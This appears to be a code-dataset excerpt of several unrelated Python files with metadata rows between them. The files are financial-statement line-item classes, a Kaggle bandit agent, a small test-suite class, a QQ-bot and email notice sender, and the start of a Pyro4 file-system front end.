self.cf_tid_11 = line_item(' Increase (Decrease) in Other',
13,
parent=self.cf_tid_7)
#########################################
## Cash From Operating Children, Other ##
#########################################
self.cf_tid_12 = line_item('Net Cash From Discontinued Operations (operating)',
14,
parent=self.cf_tid_13)
self.cf_tid_2 = line_item('Depreciation & Amortization',
4,
parent=self.cf_tid_13)
####################################
## Cash From Investing Activities ##
####################################
self.cf_tid_31 = line_item('Cash from Investing Activities',
34,
parent=self.cf_tid_56)
###################################################
## Fixed Asset/Intangibles Activity and Children ##
###################################################
self.cf_tid_14 = line_item('Change in Fixed Assets & Intangibles',
16,
parent=self.cf_tid_31)
#######################################
## Continued, Disposition Acitivites ##
#######################################
self.cf_tid_15 = line_item(' Disposition of Fixed Assets & Intangibles',
17,
parent=self.cf_tid_14)
self.cf_tid_16 = line_item(' Disposition of Fixed Assets',
18,
parent=self.cf_tid_15)
self.cf_tid_17 = line_item(' Disposition of Intangible Assets',
19,
parent=self.cf_tid_15)
#######################################
## Continued, Acquisition Acitivites ##
#######################################
self.cf_tid_18 = line_item(' Acquisition of Fixed Assets & Intangibles',
20,
parent=self.cf_tid_14)
self.cf_tid_19 = line_item(' Purchase of Fixed Assets',
21,
parent=self.cf_tid_18)
self.cf_tid_20 = line_item(' Acquisition of Intangible Assets',
22,
parent=self.cf_tid_18)
self.cf_tid_21 = line_item(' Other Change in Fixed Assets & Intangibles',
23,
parent=self.cf_tid_14)
#########################################
## LT Investment Activity and Children ##
#########################################
self.cf_tid_22 = line_item('Net Change in Long Term Investment',
24,
parent=self.cf_tid_31)
self.cf_tid_23 = line_item( 'Decrease in Long Term Investment',
25,
parent=self.cf_tid_22)
self.cf_tid_24 = line_item(' Increase in Long Term Investment',
26,
parent=self.cf_tid_22)
#################################
## M & A Activity and Children ##
#################################
self.cf_tid_25 = line_item('Net Cash From Acquisitions & Divestitures',
27,
parent=self.cf_tid_31)
self.cf_tid_26 = line_item(' Net Cash from Divestitures',
28,
parent=self.cf_tid_25)
self.cf_tid_27 = line_item(' Cash for Acqusition of Subsidiaries',
29,
parent=self.cf_tid_25)
self.cf_tid_28 = line_item(' Cash for Joint Ventures',
30,
parent=self.cf_tid_25)
self.cf_tid_50 = line_item(' Net Cash from Other Acquisitions',
31,
parent=self.cf_tid_25)
#########################################
## Cash From Investing Children, Other ##
#########################################
self.cf_tid_29 = line_item('Other Investing Activities',
32,
parent=self.cf_tid_31)
self.cf_tid_30 = line_item('Net Cash From Discontinued Operations (investing)',
33,
parent=self.cf_tid_31)
####################################
## Cash From Financing Activities ##
####################################
self.cf_tid_43 = line_item('Cash from Financing Activities',
46,
parent=self.cf_tid_56)
##########################################
## Debt Financing Activity and Children ##
##########################################
self.cf_tid_33 = line_item('Cash From (Repayment of) Debt',
36,
parent=self.cf_tid_43)
self.cf_tid_34 = line_item('Cash From (Repayment of) Short Term Debt, net',
37,
parent=self.cf_tid_33)
###################################
## Continued, LT Debt Acitivites ##
###################################
self.cf_tid_35 = line_item(' Cash From (Repayment of) Long Term Debt, net',
38,
parent=self.cf_tid_33)
self.cf_tid_36 = line_item(' Repayments of Long Term Debt',
39,
parent=self.cf_tid_35)
self.cf_tid_37 = line_item(' Cash From Long Term Debt',
40,
parent=self.cf_tid_35)
############################################
## Equity Financing Activity and Children ##
############################################
self.cf_tid_38 = line_item('Cash From (Repurchase of) Equity',
41,
parent=self.cf_tid_43)
self.cf_tid_39 = line_item(' Increase in Capital Stock',
42,
parent=self.cf_tid_38)
self.cf_tid_40 = line_item(' Decrease in Capital Stock',
43,
parent=self.cf_tid_38)
#########################################
## Cash From Financing Children, Other ##
#########################################
self.cf_tid_32 = line_item('Dividends Paid',
35,
parent=self.cf_tid_43)
self.cf_tid_41 = line_item('Other Financing Activities',
44,
parent=self.cf_tid_43)
self.cf_tid_42 = line_item('Net Cash From Discontinued Operations (financing)',
45,
parent=self.cf_tid_43)
if data:
self.add_data(data)
class balance_sheet(financial_statement):
    '''Balance-sheet statement laid out as a tree of ``line_item`` accounts.

    ``__init__`` creates every standard balance-sheet account (assets,
    liabilities and equity) and wires each to its parent so subtotals can
    roll up the tree; the integer passed to each ``line_item`` is its
    display-row order.  No data is loaded at construction time — use
    ``add_data`` to populate the accounts afterwards.
    '''
    def __init__(self, data=None):
        # data: optional initial dataset forwarded to add_data() at the end.
        ################
        ## All Assets ##
        ################
        self.bs_tid_41 = line_item('Total Assets', 40)
        ####################
        ## Current Assets ##
        ####################
        self.bs_tid_21 = line_item('Total Current Assets',
                                   20,
                                   parent=self.bs_tid_41)
        self.bs_tid_7 = line_item('Unbilled Revenues',
                                  6,
                                  parent=self.bs_tid_21)
        ##################################
        ## Cash, Equivalents & Children ##
        ##################################
        self.bs_tid_1 = line_item('Cash, Cash Equivalents & Short Term Investments',
                                  0,
                                  parent=self.bs_tid_21)
        self.bs_tid_2 = line_item('  Cash & Cash Equivalents',
                                  1,
                                  parent=self.bs_tid_1)
        self.bs_tid_3 = line_item('  Short Term Investments',
                                  2,
                                  parent=self.bs_tid_1)
        ############################
        ## Receivables & Children ##
        ############################
        self.bs_tid_4 = line_item('Accounts & Notes Receivable',
                                  3,
                                  parent=self.bs_tid_21)
        self.bs_tid_5 = line_item('  Accounts Receivable, Net',
                                  4,
                                  parent=self.bs_tid_4)
        self.bs_tid_6 = line_item('  Notes Receivable, Net',
                                  5,
                                  parent=self.bs_tid_4)
        ##########################
        ## Inventory & Children ##
        ##########################
        self.bs_tid_8 = line_item('Inventories',
                                  7,
                                  parent=self.bs_tid_21)
        self.bs_tid_9 = line_item('  Raw Materials',
                                  8,
                                  parent=self.bs_tid_8)
        self.bs_tid_10 = line_item('  Work In Process',
                                   9,
                                   parent=self.bs_tid_8)
        self.bs_tid_11 = line_item('  Finished Goods',
                                   10,
                                   parent=self.bs_tid_8)
        self.bs_tid_12 = line_item('  Other Inventory',
                                   11,
                                   parent=self.bs_tid_8)
        ######################
        ## Other & Children ##
        ######################
        self.bs_tid_13 = line_item('Other Short Term Assets',
                                   12,
                                   parent=self.bs_tid_21)
        self.bs_tid_14 = line_item('  Prepaid Expenses',
                                   13,
                                   parent=self.bs_tid_13)
        self.bs_tid_15 = line_item('  Derivative & Hedging Assets',
                                   14,
                                   parent=self.bs_tid_13)
        self.bs_tid_16 = line_item('  Assets Held-for-Sale',
                                   15,
                                   parent=self.bs_tid_13)
        self.bs_tid_17 = line_item('  Deferred Tax Assets',
                                   16,
                                   parent=self.bs_tid_13)
        self.bs_tid_18 = line_item('  Income Taxes Receivable',
                                   17,
                                   parent=self.bs_tid_13)
        self.bs_tid_19 = line_item('  Discontinued Operations',
                                   18,
                                   parent=self.bs_tid_13)
        self.bs_tid_20 = line_item('  Miscellaneous Short Term Assets',
                                   19,
                                   parent=self.bs_tid_13)
        ########################
        ## Non-Current Assets ##
        ########################
        self.bs_tid_40 = line_item('Total Noncurrent Assets',
                                   39,
                                   parent=self.bs_tid_41)
        ############
        ## PP & E ##
        ############
        self.bs_tid_22 = line_item('Property, Plant & Equipment, Net',
                                   21,
                                   parent=self.bs_tid_40)
        self.bs_tid_23 = line_item('  Property, Plant & Equipment',
                                   22,
                                   parent=self.bs_tid_22)
        self.bs_tid_24 = line_item('  Accumulated Depreciation',
                                   23,
                                   parent=self.bs_tid_22)
        ###############################
        ## LT Investments & Children ##
        ###############################
        self.bs_tid_25 = line_item('Long Term Investments & Receivables',
                                   24,
                                   parent=self.bs_tid_40)
        self.bs_tid_26 = line_item('  Long Term Investments',
                                   25,
                                   parent=self.bs_tid_25)
        self.bs_tid_27 = line_item('  Long Term Marketable Securities',
                                   26,
                                   parent=self.bs_tid_25)
        self.bs_tid_28 = line_item('  Long Term Receivables',
                                   27,
                                   parent=self.bs_tid_25)
        ######################
        ## Other & Children ##
        ######################
        self.bs_tid_29 = line_item('Other Long Term Assets',
                                   28,
                                   parent=self.bs_tid_40)
        self.bs_tid_30 = line_item('  Intangible Assets',
                                   29,
                                   parent=self.bs_tid_29)
        self.bs_tid_31 = line_item('    Goodwill',
                                   30,
                                   parent=self.bs_tid_29)
        self.bs_tid_32 = line_item('    Other Intangible Assets',
                                   31,
                                   parent=self.bs_tid_29)
        self.bs_tid_33 = line_item('  Prepaid Expense',
                                   32,
                                   parent=self.bs_tid_29)
        self.bs_tid_34 = line_item('  Deferred Tax Assets',
                                   33,
                                   parent=self.bs_tid_29)
        self.bs_tid_35 = line_item('  Derivative & Hedging Assets',
                                   34,
                                   parent=self.bs_tid_29)
        self.bs_tid_36 = line_item('  Prepaid Pension Costs',
                                   35,
                                   parent=self.bs_tid_29)
        self.bs_tid_37 = line_item('  Discontinued Operations',
                                   36,
                                   parent=self.bs_tid_29)
        self.bs_tid_38 = line_item('  Investments in Affiliates',
                                   37,
                                   parent=self.bs_tid_29)
        self.bs_tid_39 = line_item('  Miscellaneous Long Term Assets',
                                   38,
                                   parent=self.bs_tid_29)
        ################################
        ## All Liabilities and Equity ##
        ################################
        self.bs_tid_85 = line_item('Total Liabilities & Equity', 84)
        ##################
        ## Liabilities  ##
        ##################
        self.bs_tid_73 = line_item('Total Liabilities',
                                   72,
                                   parent=self.bs_tid_85)
        #########################
        ## Current Liabilities ##
        #########################
        self.bs_tid_57 = line_item('Total Current Liabilities',
                                   56,
                                   parent=self.bs_tid_73)
        #########################
        ## Payables & Children ##
        #########################
        self.bs_tid_42 = line_item('Payables & Accruals',
                                   41,
                                   parent=self.bs_tid_57)
        self.bs_tid_43 = line_item('  Accounts Payable',
                                   42,
                                   parent=self.bs_tid_42)
        self.bs_tid_44 = line_item('  Accrued Taxes',
                                   43,
                                   parent=self.bs_tid_42)
        self.bs_tid_45 = line_item('  Interest & Dividends Payable',
                                   44,
                                   parent=self.bs_tid_42)
        self.bs_tid_46 = line_item('  Other Payables & Accruals',
                                   45,
                                   parent=self.bs_tid_42)
        #####################
        ## Debt & Children ##
        #####################
        self.bs_tid_47 = line_item('Short Term Debt',
                                   46,
                                   parent=self.bs_tid_57)
        self.bs_tid_48 = line_item('  Short Term Borrowings',
                                   47,
                                   parent=self.bs_tid_47)
        self.bs_tid_49 = line_item('  Short Term Capital Leases',
                                   48,
                                   parent=self.bs_tid_47)
        self.bs_tid_50 = line_item('  Current Portion of Long Term Debt',
                                   49,
                                   parent=self.bs_tid_47)
        ######################
        ## Other & Children ##
        ######################
        self.bs_tid_51 = line_item('Other Short Term Liabilities',
                                   50,
                                   parent=self.bs_tid_57)
        self.bs_tid_52 = line_item('  Deferred Revenue',
                                   51,
                                   parent=self.bs_tid_51)
        self.bs_tid_53 = line_item('  Derivatives & Hedging',
                                   52,
                                   parent=self.bs_tid_51)
        self.bs_tid_54 = line_item('  Deferred Tax Liabilities',
                                   53,
                                   parent=self.bs_tid_51)
        self.bs_tid_55 = line_item('  Discontinued Operations',
                                   54,
                                   parent=self.bs_tid_51)
        self.bs_tid_56 = line_item('  Miscellaneous Short Term Liabilities',
                                   55,
                                   parent=self.bs_tid_51)
        #############################
        ## Non-Current Liabilities ##
        #############################
        self.bs_tid_72 = line_item('Total Noncurrent Liabilities',
                                   71,
                                   parent=self.bs_tid_73)
        #####################
        ## Debt & Children ##
        #####################
        self.bs_tid_58 = line_item('Long Term Debt',
                                   57,
                                   parent=self.bs_tid_72)
        self.bs_tid_59 = line_item('  Long Term Borrowings',
                                   58,
                                   parent=self.bs_tid_58)
        self.bs_tid_60 = line_item('  Long Term Capital Leases',
                                   59,
                                   parent=self.bs_tid_58)
        ######################
        ## Other & Children ##
        ######################
        self.bs_tid_61 = line_item('Other Long Term Liabilities',
                                   60,
                                   parent=self.bs_tid_72)
        self.bs_tid_62 = line_item('  Accrued Liabilities',
                                   61,
                                   parent=self.bs_tid_61)
        # NOTE: bs_tid_63..65 (pensions) are created further below; the
        # declaration order here intentionally does not follow tid order.
        self.bs_tid_66 = line_item('  Deferred Compensation',
                                   65,
                                   parent=self.bs_tid_61)
        self.bs_tid_67 = line_item('  Deferred Revenue',
                                   66,
                                   parent=self.bs_tid_61)
        self.bs_tid_68 = line_item('  Deferred Tax Liabilities',
                                   67,
                                   parent=self.bs_tid_61)
        self.bs_tid_69 = line_item('  Derivatives & Hedging',
                                   68,
                                   parent=self.bs_tid_61)
        self.bs_tid_70 = line_item('  Discontinued Operations',
                                   69,
                                   parent=self.bs_tid_61)
        self.bs_tid_71 = line_item('  Miscellaneous Long Term Liabilities',
                                   70,
                                   parent=self.bs_tid_61)
        #########################
        ## Continued, Pensions ##
        #########################
        self.bs_tid_63 = line_item('  Pension Liabilities',
                                   62,
                                   parent=self.bs_tid_61)
        self.bs_tid_64 = line_item('    Pensions',
                                   63,
                                   parent=self.bs_tid_63)
        self.bs_tid_65 = line_item('    Other Post-Retirement Benefits',
                                   64,
                                   parent=self.bs_tid_63)
        #############
        ## Equity  ##
        #############
        self.bs_tid_84 = line_item('Total Equity',
                                   83,
                                   parent=self.bs_tid_85)
        self.bs_tid_83 = line_item('Minority Interest',
                                   82,
                                   parent=self.bs_tid_84)
        #####################################
        ## Equity Before Minority Interest ##
        #####################################
        self.bs_tid_82 = line_item('Equity Before Minority Interest',
                                   81,
                                   parent=self.bs_tid_84)
        self.bs_tid_74 = line_item('  Preferred Equity',
                                   73,
                                   parent=self.bs_tid_82)
        self.bs_tid_79 = line_item('  Treasury Stock',
                                   78,
                                   parent=self.bs_tid_82)
        self.bs_tid_80 = line_item('  Retained Earnings',
                                   79,
                                   parent=self.bs_tid_82)
        self.bs_tid_81 = line_item('  Other Equity',
                                   80,
                                   parent=self.bs_tid_82)
        ##############################
        ## Continued, Issued Equity ##
        ##############################
        self.bs_tid_75 = line_item('Share Capital & Additional Paid-In Capital',
                                   74,
                                   parent=self.bs_tid_82)
        self.bs_tid_76 = line_item('  Common Stock',
                                   75,
                                   parent=self.bs_tid_75)
        self.bs_tid_77 = line_item('  Additional Paid in Capital',
                                   76,
                                   parent=self.bs_tid_75)
        self.bs_tid_78 = line_item('  Other Share Capital',
                                   77,
                                   parent=self.bs_tid_75)
        # Populate the freshly-built account tree if a dataset was supplied.
        if data:
            self.add_data(data)
| 49.500644
| 89
| 0.371094
| 38,427
| 0.99909
| 0
| 0
| 0
| 0
| 0
| 0
| 11,730
| 0.304976
|
36abdd1471f5a742fa98e77ecb26e8e8f6f70696
| 4,127
|
py
|
Python
|
agents/ag_useHisExplorDecayedP.py
|
a-pedram/kaggle-mab
|
5d9d6d47541f6b71a5a886146928aa57a5c77591
|
[
"MIT"
] | null | null | null |
agents/ag_useHisExplorDecayedP.py
|
a-pedram/kaggle-mab
|
5d9d6d47541f6b71a5a886146928aa57a5c77591
|
[
"MIT"
] | null | null | null |
agents/ag_useHisExplorDecayedP.py
|
a-pedram/kaggle-mab
|
5d9d6d47541f6b71a5a886146928aa57a5c77591
|
[
"MIT"
] | null | null | null |
import numpy as np
from collections import Counter
# ---- tunables -------------------------------------------------------------
decay_rate = 0.97      # per-pull decay applied to a bandit's estimated payout
n_rounds = 2000        # rounds in one multi-armed-bandit episode
bandit_count = 100     # number of machines per episode
# ---- episode state, (re)initialised inside agent() at step 0 --------------
total_reward = None    # running reward accumulated so far
last_bandit = None     # arm we pulled last step
last_reward = None     # 1/0: did our last pull pay out
his_hits = None        # per-bandit pull counts for the opponent
his_record = None      # opponent's chosen arm per step
my_record = None       # our chosen arm per step
my_hits = None         # per-bandit pull counts for us
wins = None            # per-bandit count of our winning pulls
losses = None          # per-bandit count of our losing pulls
bandits_record = None  # per-bandit 0/1 outcome history (rows = pull index)
record_index = None    # next free row in bandits_record per bandit
x1 = None              # unused placeholders (kept for compatibility)
x2 = None
# Shared probability grid on [0, 1]: support of the Beta-like posterior used
# by probab()/decayed_probab(); spp is its complement (1 - p).
sp = np.linspace(0,1,1000)
spp = 1 - sp
def probab(n_ones, n_zeros):
    """Pseudo-median of the Beta(n_ones + 1, n_zeros + 1) posterior.

    Evaluates the unnormalised posterior p**n_ones * (1-p)**n_zeros on a
    1000-point grid over [0, 1] (identical values to the module-level
    ``sp``/``spp`` arrays), locates the grid point where the cumulative
    mass reaches half the total, and adds a tiny random jitter (< 1e-4)
    so equal estimates break ties randomly.
    """
    grid = np.linspace(0, 1, 1000)
    weights = grid ** n_ones * (1 - grid) ** n_zeros
    cdf = np.cumsum(weights)
    median_idx = np.argmin(np.abs(cdf - cdf[999] / 2))
    return grid[median_idx] + np.random.rand() * 0.0001
def decayed_probab(n_ones, n_zeros, his_n, rate=None):
    """Decayed pseudo-median of the Beta-like posterior for one bandit.

    The support of the posterior is truncated to [0, rate**k] where
    k = his_n + n_ones + n_zeros + 1 is the bandit's total pull count,
    modelling the game's multiplicative payout decay.

    Parameters
    ----------
    n_ones, n_zeros : int
        Our winning / losing pulls on this bandit.
    his_n : int
        The opponent's pull count on this bandit.
    rate : float, optional
        Decay per pull; defaults to the module-level ``decay_rate``.
        (Added backward-compatibly; existing 3-argument callers are
        unaffected.)

    Fix vs. original: the truncation index is clamped to >= 1.  The old
    code crashed with an IndexError on ``cdfBeta[-1]`` once
    ``int(1000 * rate**k)`` reached 0, which happens for heavily-pulled
    bandits (k > ~227 at rate 0.97) within a 2000-round episode.
    """
    if rate is None:
        rate = decay_rate  # module-level constant (0.97)
    # Same grid values as the module-level sp/spp arrays.
    grid = np.linspace(0, 1, 1000)
    weights = grid ** n_ones * (1 - grid) ** n_zeros
    total_pulls = his_n + n_ones + n_zeros + 1
    limit = max(1, int(1000 * rate ** total_pulls))  # clamp: never empty
    cdf = np.cumsum(weights[:limit])
    place = np.argmin(np.abs(cdf - cdf[-1] / 2))
    return grid[place] + np.random.rand() * 0.0001
myProbabs = np.random.rand(bandit_count)* 0.001 + 0.5
n_lookback = 4
def new_bandit(step):
    """Pick the arm to pull this step.

    Combines a decayed-posterior score with an exploration bonus, but may
    short-circuit and copy the opponent's recently-repeated arm when it
    looks like the opponent has found a good machine we have barely tried.
    Mutates the module-level ``myProbabs`` in place.
    """
    global bandits_record, his_hits, his_record, last_bandit, myProbabs
    his_choice = his_record[step-1]
    # Refresh posterior estimates only for the two arms whose pull counts
    # changed last step (ours and the opponent's) — cheaper than all 100.
    myProbabs[last_bandit] = decayed_probab(wins[last_bandit],losses[last_bandit],his_hits[last_bandit])
    myProbabs[his_choice] = decayed_probab(wins[his_choice],losses[his_choice],his_hits[his_choice])
    # Exploration bonus shrinks as an arm accumulates losses.
    scores = myProbabs + 3 / (losses +1)
    # Look at the opponent's last n_lookback moves (fewer in early steps).
    if step < n_lookback:
        n_back = step
    else:
        n_back = n_lookback
    his_last_moves = his_record[step - n_back:step]
    move_counts = Counter(his_last_moves)
    his_winner_wins = move_counts.most_common()[0][1]
    his_winner = int(move_counts.most_common()[0][0])
#    print('step',step)
#    print('his record',his_record,'his_last_moves',his_last_moves)
#    print('his choice:',his_winner,'his choice win:',his_winner_wins,'his move counts',move_counts,'his hits',his_hits)
#    print('my hits',my_hits)
    # Copy-the-opponent heuristic, active only in the first 1000 steps:
    # follow his favourite arm if we have barely tried it ourselves and he
    # keeps returning to it (or we just won on it).
    if step < 1000:
        if my_hits[his_winner] <= 3 and his_winner_wins > 1 and my_hits[his_winner] < his_hits[his_winner]:
            if his_winner == his_record[step-2]:
#                print("his winner11!!!!")
                return his_winner
            else:
                if his_winner == last_bandit and last_reward == 1 :
#                    print("his winner22!!!!")
                    return his_winner
        else:
            if his_winner == last_bandit and last_reward == 1 :
#                print("his winner333!!!!")
                return his_winner
    # Default: greedy arm under posterior + exploration bonus.
    winner = int(np.argmax(scores))
    #winner = int(scores.argsort()[-2:][np.random.randint(2)])
#    print("My winner!!!!")
    return winner
def agent(obs, conf):
    """Multi-armed-bandit agent entry point (kaggle-style interface).

    ``obs`` carries ``step``, ``reward`` (cumulative) and ``lastActions``
    (both players' previous arms); ``conf`` carries ``banditCount``.
    Returns the index of the arm to pull.  All episode state lives in
    module-level globals so the platform can call this function statelessly.
    """
    global bandits_record, my_record, my_hits, his_hits, his_record, myProbabs
    global last_bandit, total_reward, record_index, wins, losses, last_reward
    if obs.step == 0:
        # Fresh episode: (re)initialise all module-level state and pull a
        # random arm to seed the history.
        total_reward = 0
        his_record = np.zeros(n_rounds, 'int')
        his_hits = np.zeros(conf.banditCount, 'int')
        myProbabs = np.random.rand(bandit_count)* 0.001 + 0.5
        my_record = np.zeros(n_rounds, 'int')
        my_hits = np.zeros(conf.banditCount, 'int')
        bandits_record = np.zeros([400, conf.banditCount], 'int')
        record_index = np.zeros(conf.banditCount,'int')
        wins = np.zeros(conf.banditCount, 'int')
        losses = np.zeros(conf.banditCount, 'int')
        bandit = np.random.randint(conf.banditCount)
        last_bandit = bandit
        return bandit
    # lastActions holds both players' moves in unspecified order; the one
    # that is not ours must be the opponent's.
    if obs.lastActions[0] == last_bandit:
        his_action = obs.lastActions[1]
    else:
        his_action = obs.lastActions[0]
    his_record[obs.step-1] = his_action
    his_hits[his_action] += 1
    my_hits[last_bandit] += 1
    my_record[obs.step-1] = last_bandit
    # obs.reward is cumulative; an increase means our last pull paid out.
    # (assumes rewards arrive in unit increments — TODO confirm)
    if obs.reward > total_reward:
        total_reward += 1
        bandits_record[record_index[last_bandit], last_bandit] = 1
        wins[last_bandit] += 1
        last_reward = 1
    else:
        bandits_record[record_index[last_bandit], last_bandit] = 0
        losses[last_bandit] +=1
        last_reward = 0
    record_index[last_bandit] += 1
    bandit = new_bandit(obs.step)
    last_bandit = bandit
    return bandit
| 35.886957
| 121
| 0.642598
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 431
| 0.104434
|
36ac48e2ab27df3c0677dca73c8d8951f0e9ae52
| 1,156
|
py
|
Python
|
principles-of-computing/Practice Exercises/Solitaire Mancala/Solitaire Mancala/poc_simpletest.py
|
kingwatam/misc-python
|
8a10f14eb79b9d93bbe889175fe5ab532da73c70
|
[
"MIT"
] | 1
|
2019-09-03T03:47:39.000Z
|
2019-09-03T03:47:39.000Z
|
principles-of-computing/Practice Exercises/Solitaire Mancala/Solitaire Mancala/poc_simpletest.py
|
kingwatam/misc-python
|
8a10f14eb79b9d93bbe889175fe5ab532da73c70
|
[
"MIT"
] | null | null | null |
principles-of-computing/Practice Exercises/Solitaire Mancala/Solitaire Mancala/poc_simpletest.py
|
kingwatam/misc-python
|
8a10f14eb79b9d93bbe889175fe5ab532da73c70
|
[
"MIT"
] | null | null | null |
"""
Lightweight testing class inspired by unittest from Pyunit
https://docs.python.org/2/library/unittest.html
Note that code is designed to be much simpler than unittest
and does NOT replicate unittest functionality
"""
class TestSuite:
    """
    Create a suite of tests similar to unittest.

    Tracks how many checks have run and how many failed; failures are
    reported immediately via print and summarised by report_results().

    Fixes vs. original: Python-2-only ``print`` statements replaced with
    parenthesized calls (valid under both Python 2 and 3), and the
    malformed ``\"\"\"\"`` docstring opener on report_results corrected.
    """

    def __init__(self):
        """
        Creates a test suite object with zeroed counters.
        """
        self.total_tests = 0   # number of run_test() calls so far
        self.failures = 0      # number of those that mismatched

    def run_test(self, computed, expected, message=""):
        """
        Compare computed and expected expressions.
        If not equal, print message, computed, expected and count a failure.
        """
        self.total_tests += 1
        if computed != expected:
            print(message + " Computed: " + str(computed) +
                  " Expected: " + str(expected))
            self.failures += 1

    def report_results(self):
        """
        Report back summary of successes and failures from run_test().
        """
        print("Ran " + str(self.total_tests) + " tests. " +
              str(self.failures) + " failures.")
| 31.243243
| 62
| 0.554498
| 926
| 0.801038
| 0
| 0
| 0
| 0
| 0
| 0
| 628
| 0.543253
|
36ad7dd9946b30b8edbad769fd9fe67f2dcb1c2d
| 2,014
|
py
|
Python
|
jwc_core/jwc_sender.py
|
Inetgeek/Notice-Pusher
|
052e4ecbf7520ae93e16af6ae89f560d6a6d888a
|
[
"MIT"
] | 2
|
2021-09-16T04:19:52.000Z
|
2022-03-28T03:48:29.000Z
|
jwc_core/jwc_sender.py
|
Inetgeek/Notice-Pusher
|
052e4ecbf7520ae93e16af6ae89f560d6a6d888a
|
[
"MIT"
] | null | null | null |
jwc_core/jwc_sender.py
|
Inetgeek/Notice-Pusher
|
052e4ecbf7520ae93e16af6ae89f560d6a6d888a
|
[
"MIT"
] | 1
|
2021-09-16T04:21:08.000Z
|
2021-09-16T04:21:08.000Z
|
#!/usr/bin/python3
# coding: utf-8
import sys
import os, time, datetime
import smtplib
from email import (header)
from email.mime import (text, multipart)
# Read the pending notice text cached by the scraper.
# (original note: "自行更改路径" — change this path for your own deployment)
with open(r'/home/jwc_notice.txt', "r+", encoding="utf-8") as file:
    a = file.read()
# Email subject and HTML body used by the fallback mail sender below.
send_title = "机器人风险提示"
send_head = '<p style="color:#507383">亲爱的主人:</p>'
send_content = '<p style="font-size:34px;color:#ca1b0f;"><span style="border-bottom: 1px dashed #ccc; z-index: 1; position: static;">账号被风控,请及时处理!</span></p>'+'<hr><p style="color:#FC5531">教务处通知为:<p>\n\n'+a
def sender_mail():
    """Fallback notifier: email the notice via QQ-mail SMTP over SSL.

    Uses the module-level ``send_title``/``send_content``.  Credentials
    and addresses are placeholders ('xxxxxx') to be filled in by the
    deployer.  Per-recipient failures are skipped (best-effort delivery).
    """
    session = smtplib.SMTP_SSL('smtp.qq.com', 465)
    from_addr = 'xxxxxx'            # sender account (placeholder)
    session.login(from_addr, "xxxxxx")  # placeholder password / auth code
    recipients = ['xxxxxx']         # placeholder recipient list
    for to_addr in recipients:
        try:
            message = multipart.MIMEMultipart()
            message['From'] = "InetGeek"
            message['To'] = to_addr
            message['subject'] = header.Header(send_title, 'utf-8')
            message.attach(text.MIMEText(send_content, 'html', 'utf-8'))
            session.sendmail(from_addr, to_addr, message.as_string())
            print('成功发送给%s' % (to_addr))
        except Exception:
            # Best-effort: keep trying the remaining recipients.
            continue
    session.quit()
# Timestamp captured once at import time and appended to outgoing messages.
Nowtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
# @scheduler.scheduled_job('cron', hour = 22,minute = 50)
async def _init_():  # original note: for personal use remove asyncio (drop `async`)
    """Push the cached notice via the QQ bot, falling back to email.

    NOTE(review): ``bot`` is not defined in this file — presumably injected
    by the hosting bot framework; verify before running standalone.  The
    ``user_id``/``group_id`` placeholders (1xxxxxxx2 etc.) are NOT valid
    Python literals and must be replaced with real QQ ids for this file to
    even compile.
    """
    with open(r'/home/jwc_notice.txt', "r+", encoding="utf-8") as file:
        a = file.read()
        if len(a) > 0:
            # original note: replace the two sends below with your own push
            # channel (e.g. a push+ / WeChat endpoint); do not use as-is.
            try:
                await bot.send_msg(user_id=1xxxxxxx2, message=a+'\n'+'\n当前时间: '+Nowtime)
                await bot.send_group_msg(group_id=2xxxxxxxx7, message=a+'\n [CQ:at,qq=all]'+'\n当前时间: '+Nowtime)
                # Clear the notice file once delivered.
                file.seek(0)
                file.truncate()
            except:
                # Any failure (including bot being unavailable): email instead.
                sender_mail()
                file.seek(0)
                file.truncate()
                sys.exit()
if __name__ == '__main__':
    # NOTE(review): _init_ is a coroutine; calling it bare only creates the
    # coroutine object and never runs it — standalone use would need
    # asyncio.run(_init_()).  Left unchanged as the file targets a bot
    # framework that awaits it.
    _init_()
| 36.618182
| 205
| 0.600298
| 0
| 0
| 0
| 0
| 0
| 0
| 745
| 0.335888
| 839
| 0.378269
|
36adec35d9afaf6063824fc88cc7373dff86a943
| 6,328
|
py
|
Python
|
distributed_systems/ftp/frontend.py
|
JRhodes95/net-sys-cw
|
926ea3b133416c4a6f8065be5caa34a5e5b49878
|
[
"MIT"
] | null | null | null |
distributed_systems/ftp/frontend.py
|
JRhodes95/net-sys-cw
|
926ea3b133416c4a6f8065be5caa34a5e5b49878
|
[
"MIT"
] | null | null | null |
distributed_systems/ftp/frontend.py
|
JRhodes95/net-sys-cw
|
926ea3b133416c4a6f8065be5caa34a5e5b49878
|
[
"MIT"
] | null | null | null |
import os
os.environ["PYRO_LOGFILE"] = "pyro.log"
os.environ["PYRO_LOGLEVEL"] = "DEBUG"
import Pyro4
import Pyro4.util
import Pyro4.naming
import sys
import pprint
"""
Front end controller for the 2017/18 Networks and Distributed Systems
Summative Assignment.
Author: Z0954757
"""
# Show remote Pyro tracebacks when an uncaught exception crosses the wire.
sys.excepthook = Pyro4.util.excepthook
pp = pprint.PrettyPrinter()  # NOTE(review): unused in the visible code
def main():
    """Bootstrap the front-end controller.

    Locates the file servers, exposes the controller on a Pyro daemon,
    registers it with the Pyro name server as ``filesystem.frontend``,
    then blocks serving client requests.
    """
    controller = FrontEnd()
    controller.find_servers()
    with Pyro4.Daemon() as daemon:
        uri = daemon.register(controller)
        with Pyro4.locateNS() as name_server:
            name_server.register("filesystem.frontend", uri)
        print("Frontend available.")
        daemon.requestLoop()
@Pyro4.expose
class FrontEnd(object):
    """Class to represent the front end controller. This class accepts
    connections from a client application, decides the appropriate action to
    perform, and dispatches commands to the servers on the file system.
    """
    def __init__(self):
        # Pyro4.Proxy objects for every discovered file server.
        self.active_servers = []

    def find_servers(self):
        """Method to find any servers existing on the network using the Pyro
        Naming Server to look up servers registered under
        ``filesystem.fileserver.*``.

        Raises ValueError when no servers are registered.
        """
        with Pyro4.locateNS() as ns:
            for server, server_uri in ns.list(prefix="filesystem.fileserver.").items():
                print("Found server at: {0}".format(server))
                self.active_servers.append(Pyro4.Proxy(server_uri))
        if not self.active_servers:
            raise ValueError("No servers found! (Have you started the servers first?)")

    def connect_client(self,client_name):
        """Method called by the client to initiate a connection between the two.
        Returns a greeting string.
        """
        print("Client {0} connected.".format(client_name))
        return "Hello {0}, you are now connected to the file system.".format(client_name)

    def list_all(self):
        """Method called by the client to list all the files on the file system.
        Queries all currently connected servers for files and returns them as a
        single list to the client, removing duplicate instances where a file is
        stored on multiple servers.

        NOTE(review): converting through set() loses ordering — callers must
        not rely on a stable file order.
        """
